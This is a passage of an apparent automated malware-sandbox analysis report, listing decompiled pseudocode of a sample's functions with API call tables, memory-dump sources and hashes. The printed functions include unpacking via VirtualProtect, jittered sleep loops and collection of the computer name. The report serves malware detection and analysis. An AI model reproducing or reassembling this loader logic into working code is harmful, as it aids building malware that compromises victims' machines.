					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x5ea348; // 0x25dd5a8
						_t11 = _t32 + 0x5ebcc8; // 0x2bc9270
						_t48 = _t11;
						_t12 = _t32 + 0x5ebb60; // 0x4f0053
						_t52 = E005E5DE4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x5ea348; // 0x25dd5a8
							_t13 = _t35 + 0x5ebcf0; // 0x30314549
							if(E005E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x5ea2fc - 6;
								if( *0x5ea2fc <= 6) {
									_t42 =  *0x5ea348; // 0x25dd5a8
									_t15 = _t42 + 0x5ebcd2; // 0x52384549
									E005E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x5ea348; // 0x25dd5a8
							_t17 = _t38 + 0x5ebbb8; // 0x2bc9160
							_t18 = _t38 + 0x5ebc1c; // 0x680043
							_t45 = E005E5B0E(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x5ea2d8, 0, _t52);
						}
					}
					HeapFree( *0x5ea2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E005E7220(_t54);
				}
				return _t45;
			}


















          0x005e5251
          0x005e5261
          0x005e5264
          0x005e526b
          0x005e526d
          0x005e526d
          0x005e5270
          0x005e5275
          0x005e527c
          0x005e5289
          0x005e528e
          0x005e5292
          0x005e52a0
          0x005e52ae
          0x005e52b2
          0x005e5343
          0x005e5343
          0x005e52b8
          0x005e52b8
          0x005e52bd
          0x005e52bd
          0x005e52c4
          0x005e52d0
          0x005e52d2
          0x005e52d4
          0x005e52d6
          0x005e52dd
          0x005e52ef
          0x005e52f1
          0x005e52f8
          0x005e52fa
          0x005e5301
          0x005e530c
          0x005e530c
          0x005e52f8
          0x005e5311
          0x005e5316
          0x005e531d
          0x005e533b
          0x005e533d
          0x005e533d
          0x005e52d4
          0x005e534f
          0x005e534f
          0x005e5351
          0x005e5356
          0x005e5358
          0x005e5358
          0x005e5363

          APIs
          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BC9218,00000000,?,7476F710,00000000,7476F730), ref: 005E52A0
          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BC9160,?,00000000,30314549,00000014,004F0053,02BC9270), ref: 005E533D
          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E68B6), ref: 005E534F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          • Opcode ID: 34c0ce039314e83fd156dd624d819332bffa23940d06e7e403af0ad2e5066ec1
          • Instruction ID: e85a500c0045fc7e668ffc4ae07da0928315121b10c348f5bd9701d4292ae325
          • Opcode Fuzzy Hash: 34c0ce039314e83fd156dd624d819332bffa23940d06e7e403af0ad2e5066ec1
          • Instruction Fuzzy Hash: EF31A335900299AFDB19DBA2DCC9EAE3BBCFB58744F140095F580AB121E7706E08DB11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4358 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
          Download Yara Rule
          APIs
          • SysAllocString.OLEAUT32(80000002), ref: 005E43B5
          • SysAllocString.OLEAUT32(005E4D42), ref: 005E43F9
          • SysFreeString.OLEAUT32(00000000), ref: 005E440D
          • SysFreeString.OLEAUT32(00000000), ref: 005E441B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree
          • String ID:
          • API String ID: 344208780-0
          • Opcode ID: 373ecd8175c8a5b0e9e6455d4c242570479dbd95118ca49a1ebb11ab76cad81e
          • Instruction ID: 4c71c5d52f609d9a75f1c4588d7aa17a63e9d3964d3364f333df07e0162e21e6
          • Opcode Fuzzy Hash: 373ecd8175c8a5b0e9e6455d4c242570479dbd95118ca49a1ebb11ab76cad81e
          • Instruction Fuzzy Hash: 50310EB5900289AFCF09DF99D8C49AE7BB5FF58301B20882EF5469B250D7309A85CF65
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E213E Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
          Download Yara Rule
          C-Code - Quality: 65%
          			E005E213E(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L005E8436();
					_t34 = _t16 + _t13;
					_t17 = E005E6269(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











          0x005e2143
          0x005e214e
          0x005e214f
          0x005e214f
          0x005e215b
          0x005e2164
          0x005e2167
          0x005e216b
          0x005e216d
          0x005e2172
          0x005e2173
          0x005e2174
          0x005e217e
          0x005e2181
          0x005e2188
          0x005e218c
          0x005e2193
          0x005e2199
          0x005e21a3

          APIs
          • SwitchToThread.KERNEL32(?,00000001,?,?,?,005E5044,?,?), ref: 005E214F
          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,005E5044,?,?), ref: 005E215B
          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 005E2174
            • Part of subcall function 005E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 005E6308
          • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,005E5044,?,?), ref: 005E2193
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
          • String ID:
          • API String ID: 1610602887-0
          • Opcode ID: 020473424ff8a91fb9163db8f7b1f78a3f239405627f15407678beca65e0001d
          • Instruction ID: 06413faab9b176978b51a599a65d0926ee84facb033684e19f346fabd2c6afe0
          • Opcode Fuzzy Hash: 020473424ff8a91fb9163db8f7b1f78a3f239405627f15407678beca65e0001d
          • Instruction Fuzzy Hash: 3CF0A477B402047BD7189BA5CC5EBDF7AB9EBC4361F500124F601E7340E9B4AA05C690
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 87%
          			E004014CF(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t42;
				long _t53;
				intOrPtr _t56;
				void* _t57;
				signed int _t59;

				_v12 = _v12 & 0x00000000;
				_t56 =  *0x404180;
				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t59 = _v12;
					if(_t59 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t53 = _t56 - 0x43175abf;
							L9:
							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
							if(_t42 == 0) {
								_v12 = GetLastError();
							}
							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
							_v8 = _v8 + 1;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t53 = _t56 - 0x43175ac1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						_t53 = _t56 - 0x43175aa3;
					} else {
						_t53 = _t56 - 0x43175a83;
					}
					goto L9;
				}
				goto L12;
			}












          0x004014d9
          0x004014e6
          0x004014ec
          0x004014f8
          0x00401508
          0x0040150a
          0x00401512
          0x004015a6
          0x004015ad
          0x00000000
          0x00000000
          0x00000000
          0x00401518
          0x00401518
          0x00401518
          0x0040151c
          0x00000000
          0x00000000
          0x00401528
          0x0040152c
          0x00401550
          0x00401554
          0x00401568
          0x00401568
          0x0040156e
          0x0040157d
          0x00401581
          0x00401589
          0x00401589
          0x00401595
          0x00401597
          0x004015a0
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004015a0
          0x0040155c
          0x00401560
          0x00401566
          0x00000000
          0x00000000
          0x00000000
          0x00401566
          0x00401534
          0x00401538
          0x00401542
          0x0040153a
          0x0040153a
          0x0040153a
          0x00000000
          0x00401538
          0x00000000

          APIs
          • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
          • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
          • GetLastError.KERNEL32 ref: 00401583
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ProtectVirtual$ErrorLast
          • String ID:
          • API String ID: 1469625949-0
          • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
          • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
          • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
          • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E12C6 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
          Download Yara Rule
          C-Code - Quality: 47%
          			E005E12C6(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E005E33DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x5e9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











          0x005e12ca
          0x005e12d7
          0x005e12d9
          0x005e12da
          0x005e12e2
          0x005e12e2
          0x005e12e6
          0x00000000
          0x00000000
          0x005e12dd
          0x005e12de
          0x005e12e1
          0x005e12e1
          0x005e12ee
          0x005e12f3
          0x005e12f8
          0x005e1300
          0x005e1306
          0x005e1308
          0x005e130b
          0x005e130f
          0x005e1311
          0x005e1314
          0x005e1314
          0x005e1315
          0x005e1317
          0x005e1314
          0x005e1321
          0x005e1324
          0x005e1327
          0x005e1328
          0x005e132a
          0x005e1331
          0x005e1331
          0x005e133d

          APIs
          • StrChrA.SHLWAPI(?,00000020,00000000,02BC95FC,?,?,005E53AF,?,02BC95FC), ref: 005E12E2
          • StrTrimA.KERNELBASE(?,005E9278,00000002,?,005E53AF,?,02BC95FC), ref: 005E1300
          • StrChrA.SHLWAPI(?,00000020,?,005E53AF,?,02BC95FC), ref: 005E130B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Trim
          • String ID:
          • API String ID: 3043112668-0
          • Opcode ID: 413196ea8a6af40c944c27132c4e649089f26d658242818153597a6e97add699
          • Instruction ID: 746232cfe7fa8d8d53803e778d091090d691b457073790024cd3cee569935a41
          • Opcode Fuzzy Hash: 413196ea8a6af40c944c27132c4e649089f26d658242818153597a6e97add699
          • Instruction Fuzzy Hash: A4019A713007866EEB184E6B8C88FAB7E8CFB99340F541411AA95CB282DA70D842C268
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E61DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E61DA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x5ea2d8, 0, _a4); // executed
				return _t2;
			}




          0x005e61e6
          0x005e61ec

          APIs
          • RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          • Opcode ID: 2e624c72a5c8d026fcd95bfc3200126b94cc3d9eb04cb54ed9c8067474979bc8
          • Instruction ID: b6cb119b5008ea878663f161b57884518660dc24e7c6e8ce2317c8b8d4ef7130
          • Opcode Fuzzy Hash: 2e624c72a5c8d026fcd95bfc3200126b94cc3d9eb04cb54ed9c8067474979bc8
          • Instruction Fuzzy Hash: BDB012B5100380ABCB154B11DE48F057A21A7B0700F004010B3841807082321424FB16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E790B Relevance: 3.1, APIs: 2, Instructions: 112COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E005E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E005E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x5ea348; // 0x25dd5a8
						_t20 = _t68 + 0x5eb270; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E005E4984(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















          0x005e7911
          0x005e7914
          0x005e7924
          0x005e792d
          0x005e7931
          0x005e79ff
          0x005e7a05
          0x005e7a05
          0x005e794b
          0x005e7950
          0x005e7954
          0x005e795a
          0x005e795f
          0x005e7966
          0x005e7975
          0x005e7975
          0x005e7979
          0x005e797b
          0x005e7987
          0x005e7992
          0x005e799d
          0x005e79a1
          0x005e79ab
          0x005e79af
          0x005e79b1
          0x005e79b6
          0x005e79bd
          0x005e79cd
          0x005e79cd
          0x005e79b6
          0x005e79af
          0x005e79cf
          0x005e79d4
          0x005e79d9
          0x005e79d9
          0x005e79dc
          0x005e79e5
          0x005e79ea
          0x005e79ea
          0x005e79ef
          0x005e79f4
          0x005e79f4
          0x005e79ef
          0x005e7979
          0x005e79f6
          0x005e79fc
          0x00000000

          APIs
            • Part of subcall function 005E4358: SysAllocString.OLEAUT32(80000002), ref: 005E43B5
            • Part of subcall function 005E4358: SysFreeString.OLEAUT32(00000000), ref: 005E441B
          • SysFreeString.OLEAUT32(?), ref: 005E79EA
          • SysFreeString.OLEAUT32(005E4D42), ref: 005E79F4
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$Free$Alloc
          • String ID:
          • API String ID: 986138563-0
          • Opcode ID: bae394039d966b7a426b6f6565f8922350a190a4e6a814cd7acb879baf9100f7
          • Instruction ID: a2c8c8db880fd34083576054852ca89eb070f492edd016bd5665bb3dc66333b8
          • Opcode Fuzzy Hash: bae394039d966b7a426b6f6565f8922350a190a4e6a814cd7acb879baf9100f7
          • Instruction Fuzzy Hash: 7A315972500199AFCF19DF69C888CABBB7AFFC97407144658F895DB211D3319D91CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0040139F() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x40513c;
				} else {
					_t16 = _t15 + 0x40529c;
				}
				E00401D3C(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FE6(_t32 + 4);
						}
					}
					_t25 = E004012FB(_v28); // executed
				}
				ExitThread(_t25);
			}
















          0x004013a5
          0x004013b6
          0x004013c0
          0x004013b8
          0x004013b8
          0x004013b8
          0x004013c7
          0x004013d0
          0x004013d5
          0x004013ec
          0x004013f3
          0x00401450
          0x004013f5
          0x004013fb
          0x00401401
          0x0040140f
          0x00401413
          0x0040141a
          0x00401422
          0x00401426
          0x0040142e
          0x0040143f
          0x00401430
          0x00401436
          0x00401436
          0x0040142e
          0x00401447
          0x00401447
          0x00401452

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ExitThreadlstrlen
          • String ID:
          • API String ID: 2636182767-0
          • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
          • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
          • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
          • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E33F1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E005E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x5ea2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E005E2839(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








          0x005e33f1
          0x005e33f9
          0x005e3410
          0x005e342b
          0x005e342f
          0x005e3434
          0x005e3436
          0x005e3448
          0x005e3454
          0x005e3438
          0x005e3438
          0x005e343d
          0x005e3442
          0x005e3442
          0x005e3436
          0x005e345a
          0x005e345e
          0x005e345e
          0x005e3405
          0x005e340a
          0x005e340e
          0x00000000
          0x00000000
          0x00000000

          APIs
            • Part of subcall function 005E2839: SysFreeString.OLEAUT32(00000000), ref: 005E289C
          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,005E528E,?,004F0053,02BC9218,00000000,?), ref: 005E3454
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Free$HeapString
          • String ID: Uqt
          • API String ID: 3806048269-2320327147
          • Opcode ID: 113f1f9159d24f94620fb0f655a744f8de2826752b311d795f13a905916c8c9d
          • Instruction ID: ae8c839679d872be4395f067339b9f1732e417c7f22d3ce542fa6b2741532b2b
          • Opcode Fuzzy Hash: 113f1f9159d24f94620fb0f655a744f8de2826752b311d795f13a905916c8c9d
          • Instruction Fuzzy Hash: 84012C32500699BBCF279F55CC09EDA3FA5FF54750F048024FE459B160D7319A60DB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E472F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E005E472F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E005E33DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E005E61DA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









          0x005e4734
          0x005e473f
          0x005e4741
          0x005e4747
          0x005e4749
          0x005e474e
          0x005e4757
          0x005e475b
          0x005e4764
          0x005e4768
          0x005e4777
          0x005e476a
          0x005e476b
          0x005e4770
          0x005e4770
          0x005e4768
          0x005e475b
          0x005e4780

          APIs
          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E3DCD,00000000,00000000,?,775EC740,005E3DCD), ref: 005E4747
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetComputerNameExA.KERNELBASE(00000003,00000000,005E3DCD,005E3DCE,?,775EC740,005E3DCD), ref: 005E4764
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ComputerHeapName$AllocateFree
          • String ID:
